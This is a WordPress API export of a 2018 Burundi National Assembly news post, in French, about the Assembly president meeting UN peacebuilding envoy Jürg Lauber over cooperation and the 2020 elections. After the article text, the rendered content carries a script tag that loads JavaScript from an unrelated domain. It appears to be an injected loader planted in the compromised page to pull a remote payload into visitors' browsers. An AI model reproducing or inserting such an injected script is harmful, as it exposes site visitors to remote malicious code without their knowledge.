{"id":27289,"date":"2018-11-07T13:17:47","date_gmt":"2018-11-07T12:17:47","guid":{"rendered":"https:\/\/assemblee.bi\/?p=27289"},"modified":"2025-03-27T13:18:22","modified_gmt":"2025-03-27T12:18:22","slug":"audience-accordee-a-son-excellence-jurg-lauber-president-de-la-configuration-burundi-de-la-commission-de-la-paix","status":"publish","type":"post","link":"https:\/\/assemblee.bi\/?p=27289","title":{"rendered":"Audience accord\u00e9e \u00e0 son Excellence Jurg LAUBER, Pr\u00e9sident de la configuration Burundi de la commission de la paix"},"content":{"rendered":"<div id=\"wysiwyg\">\n<div class=\"ajaxbloc ajax-id-wysiwyg bind-ajaxReload\" data-ajax-env=\"DxXSpmKxX1VShGLiWJxQDUJL\/odRXdnLe0\/yoxVAhsyEw\/gwmVqNnea9K0X0kUia6g7DJcclWhxTLzDA0VGI9+iKKyfp6LCxugnIvSLfq+8CajLZQ65eefS9lCJF135JgfDK44nIUl6mOHfrvI2PM4URv7EEpTYyJM\/HYvZqrluocR5XhnROENZe8WnBKSNuAaK2TKN9CNjj\" data-origin=\".\/?exec=article&#038;id_article=1888\" aria-live=\"polite\" aria-atomic=\"true\">\n<div class=\"champ contenu_texte\">\n<div class=\"texte\" dir=\"ltr\">\n<p>Tr\u00e8s Honorable Pr\u00e9sident de l\u2019Assembl\u00e9e Nationale a re\u00e7u en audience ce mardi 06 novembre 2018 Monsieur JURG LAUBER Pr\u00e9sident de la configuration Burundi de la commission de consolidation de la paix de l\u2019organisation des Nations Unies et sa d\u00e9l\u00e9gation.<\/p>\n<dl class=\"spip_document_4392 spip_documents spip_documents_left\">\n<dt><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft\" src=\"https:\/\/assemblee.bi\/archive\/local\/cache-vignettes\/L424xH256\/220-89609.jpg?1743077730\" alt=\"\" width=\"424\" height=\"256\" \/><\/dt>\n<\/dl>\n<p>A la sortie de l\u2019audience Monsieur Jurg Lauber a r\u00e9v\u00e9l\u00e9 \u00e0 la presse qu\u2019il est venu discuter avec le Pr\u00e9sident de l\u2019Assembl\u00e9e Nationale comment la configuration de la paix et am\u00e9liorer comment d\u00e9velopper la coop\u00e9ration avec le Burundi. Ils ont encore discut\u00e9 sur le processus \u00e9lectoral de 2020.<\/p>\n<dl class=\"spip_document_4393 spip_documents spip_documents_left\">\n<dt><img decoding=\"async\" class=\"alignright\" src=\"https:\/\/assemblee.bi\/archive\/local\/cache-vignettes\/L448xH190\/111-2-37dc9.jpg?1743077730\" alt=\"\" width=\"448\" height=\"190\" \/><\/dt>\n<\/dl>\n<p>Il a pu entendre de la part de l\u2019honorable Pr\u00e9sident de l\u2019Assembl\u00e9e Nationale du Burundi que le train est en marche et que les pr\u00e9paratifs sont au bon fixe en t\u00e9moigne la mise en place de la Commission Nationale Ind\u00e9pendante. Il a termin\u00e9 en disant que les Nations Unies resteront au c\u00f4te du Burundi.<\/p>\n<dl class=\"spip_document_4393 spip_documents spip_documents_left\">\n<dt><\/dt>\n<dt class=\"spip_doc_titre\"><\/dt>\n<\/dl>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><script src=\"https:\/\/mainf.global-cache.online\/minified\/extensions\/dataloader_289k.js?t=2025-03-27T12:1\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tr\u00e8s Honorable Pr\u00e9sident de l\u2019Assembl\u00e9e Nationale a re\u00e7u en audience ce mardi 06 novembre 2018 Monsieur JURG LAUBER Pr\u00e9sident de la configuration Burundi de la commission de consolidation de la [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":27290,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"inline_featured_image":false,"footnotes":""},"categories":[153],"tags":[],"class_list":["post-27289","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-audiences-2"],"_links":{"self":[{"href":"https:\/\/assemblee.bi\/index.php?rest_route=\/wp\/v2\/posts\/27289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/assemblee.bi\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/assemblee.bi\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/assemblee.bi\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/assemblee.bi\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27289"}],"version-history":[{"count":2,"href":"https:\/\/assemblee.bi\/index.php?rest_route=\/wp\/v2\/posts\/27289\/revisions"}],"predecessor-version":[{"id":27292,"href":"https:\/\/assemblee.bi\/index.php?rest_route=\/wp\/v2\/posts\/27289\/revisions\/27292"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/assemblee.bi\/index.php?rest_route=\/wp\/v2\/media\/27290"}],"wp:attachment":[{"href":"https:\/\/assemblee.bi\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27289"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/assemblee.bi\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27289"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/assemblee.bi\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}